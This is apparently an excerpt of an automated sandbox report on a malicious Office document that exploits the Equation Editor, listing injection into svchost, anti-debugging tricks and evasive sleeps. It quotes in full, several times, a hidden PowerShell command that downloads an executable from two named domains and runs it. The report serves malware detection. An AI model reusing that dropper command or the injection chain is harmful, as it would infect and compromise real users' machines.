Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process created: C:\Windows\System32\svchost.exe svchost.exe	Jump to behavior

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}\InProcServer32

Jump to behavior

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Jump to behavior

Checks if Microsoft Office is installed

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Jump to behavior

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll

Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:	Binary string: mscorrc.pdb source: powershell.exe, 0000000A.00000002.10103033130.04DF0000.00000002.sdmp
Source:	Binary string: C:\Users\jawa\Desktop\Response.pdb; source: powershell.exe, 0000000A.00000002.10095450491.01D62000.00000004.sdmp
Source:	Binary string: C:\Users\jawa\Desktop\Response.pdb source: powershell.exe, 0000000A.00000002.10095450491.01D62000.00000004.sdmp, ounehcnaykuL.exe.10.dr
Source:	Binary string: C:\Work\A_Modules\Sysinfo\x86\Release\GetSystemInfo.pdbHS source: ounehcnaykuM.exe, 00000015.00000002.10780399034.01CDA000.00000004.sdmp, svchost.exe, 00000017.00000000.10695933341.10001000.00000004.sdmp
Source:	Binary string: C:\Work\A_Modules\Sysinfo\x86\Release\GetSystemInfo.pdb source: ounehcnaykuM.exe, 00000015.00000002.10780399034.01CDA000.00000004.sdmp, svchost.exe, 00000017.00000000.10695933341.10001000.00000004.sdmp

Document has a 'vbamacros' value indicative for goodware

Show sources

Source: VBA869.tmp.14.dr

Initial sample: OLE indicators vbamacros = False

HIPS / PFW / Operating System Protection Evasion:

Allocates memory in foreign processes

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 60000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: B0000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 10000000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 10000000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 10001000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 10010000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 10014000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 10017000 protect: page read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 130000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 130000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory allocated: C:\Windows\System32\svchost.exe base: 20000 protect: page execute and read and write	Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Memory written: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe base: 400000 value starts with: 4D5A	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10000000 value starts with: 4D5A	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Thread register set: target process: 2780	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Thread register set: target process: 2992	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Thread register set: target process: 3060	Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 60000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: B0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: EE2104	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10000000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10001000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10001000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10010000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10010000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10014000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10014000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10017000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10017000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 130000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: B0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 130000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: B0000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10010018	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 1001001C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10010020	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10010024	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10010028	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 1001002C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10010030	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10010034	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10010038	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 1001003C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10010040	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10010044	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10010048	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 1001004C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10010050	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10010054	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10010058	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 1001005C	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 10010060	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Memory written: C:\Windows\System32\svchost.exe base: 20000	Jump to behavior

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\System32\cmd.exe CmD /C %tmp%\task.bat & UUUUUUUU c	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Process created: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe'	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process created: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Process created: C:\Windows\System32\svchost.exe svchost.exe	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell -W Hidden ''function jester18([String] $hothenry){(New-Object System.Net.WebClient).DownloadFile($hothenry,'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe');Start-Process 'C:\Users\user~1\AppData\Local\Temp\ounehcnaykuL.exe';}try{jester18('http://figs4u.co.uk/logo.bin')}catch{jester18('http://responsivepixels.co.uk/logo.bin')}''			Jump to behavior

Contains functionality to create a new security descriptor

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

Code function: 18_2_001E6E00 VariantClear,VariantInit,GetCurrentProcess,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,CloseHandle,

18_2_001E6E00

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: svchost.exe, 00000017.00000002.10782508684.00EF0000.00000002.sdmp	Binary or memory string: Progman
Source: svchost.exe, 00000017.00000002.10782508684.00EF0000.00000002.sdmp	Binary or memory string: Program Manager
Source: svchost.exe, 00000017.00000002.10782508684.00EF0000.00000002.sdmp	Binary or memory string: Shell_TrayWnd

Anti Debugging:

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE

System information queried: KernelDebuggerInformation

Jump to behavior

Checks if the current process is being debugged

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	Process queried: DebugPort			Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

Code function: 18_2_001F2F40 rdtsc

18_2_001F2F40

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

Code function: 18_2_00415D50 GetCurrentProcess,LoadLibraryA,GetProcAddress,GetProcAddress,NtQueryInformationProcess,

18_2_00415D50

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

Code function: 18_2_001F1F60 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcessHeap,RtlReAllocateHeap,RtlAllocateHeap,

18_2_001F1F60

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Contains functionality to register its own exception handler

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 18_2_001E9640 SetUnhandledExceptionFilter,	18_2_001E9640
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 18_2_001E2C63 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_001E2C63
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 21_2_00179640 SetUnhandledExceptionFilter,	21_2_00179640
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 21_2_00172C63 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_00172C63

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory allocated: page read and write | page guard

Jump to behavior

Malware Analysis System Evasion:

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

Code function: 18_2_001F2F40 rdtsc

18_2_001F2F40

Contains functionality to query network adapater information

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,		18_2_001F0E90
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: GetAdaptersInfo,GetAdaptersInfo,GetAdaptersInfo,		21_2_00180E90

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Show sources

Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Window / User API: threadDelayed 36115	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ounehcnaykuL.exe	Window / User API: threadDelayed 463886	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Window / User API: threadDelayed 36877	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Window / User API: threadDelayed 463124	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Window / User API: threadDelayed 1000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Window / User API: threadDelayed 492163	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Window / User API: threadDelayed 7838	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Window / User API: threadDelayed 998	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3972	Thread sleep count: 50 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4032	Thread sleep time: -922337203685477s >= -60000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe TID: 2776	Thread sleep count: 36877 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe TID: 2776	Thread sleep count: 463124 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe TID: 2984	Thread sleep count: 1000 > 30	Jump to behavior
Source: C:\Windows\System32\taskeng.exe TID: 2672	Thread sleep time: -120000s >= -60000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe TID: 2528	Thread sleep count: 492163 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe TID: 2528	Thread sleep count: 7838 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe TID: 3080	Thread sleep count: 998 > 30	Jump to behavior

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 18_2_001E2530 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindNextFileW,GetLastError,FindClose,		18_2_001E2530
Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe	Code function: 21_2_00172530 GetFullPathNameW,PathAddBackslashW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindNextFileW,GetLastError,FindClose,		21_2_00172530

Contains functionality to query system information

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

Code function: 18_2_001E4A60 GetVersionExW,GetModuleHandleW,GetProcAddress,GetSystemInfo,

18_2_001E4A60

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network Connect: 87.247.241.143 80

Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Show sources

Source: C:\Users\user\AppData\Roaming\freenet\ounehcnaykuM.exe

Code function: 18_2_001EEDA0 GetVersion,LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,

18_2_001EEDA0

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
